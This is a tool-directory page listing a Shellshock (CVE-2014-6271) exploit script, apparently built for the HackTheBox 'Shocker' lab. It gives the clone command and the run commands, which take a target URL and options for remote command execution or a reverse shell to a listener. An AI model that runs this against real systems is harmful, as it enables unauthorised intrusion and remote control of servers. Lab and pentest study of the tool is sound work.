Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cgi-bin-shellshock — [Python/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271 | Kitploit
Tools/GitHubGitHub/gurguii/cgi-bin-shellshock
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubgurguii/cgi-bin-shellshock

cgi-bin-shellshock

[Python/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

How to use

Clone the repository (or just copy-paste the one you prefer)

root@kitploit:~
  sudo git clone https://github.com/Gurguii/shellshock.sh

Run the script

  • Bash
root@kitploit:~
    bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
  • Python
root@kitploit:~
    python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>

Note: default LPORT is 4444, URL required. If just URL given, it will RCE, else it will RSHELL to given lhost and lport

Download Tool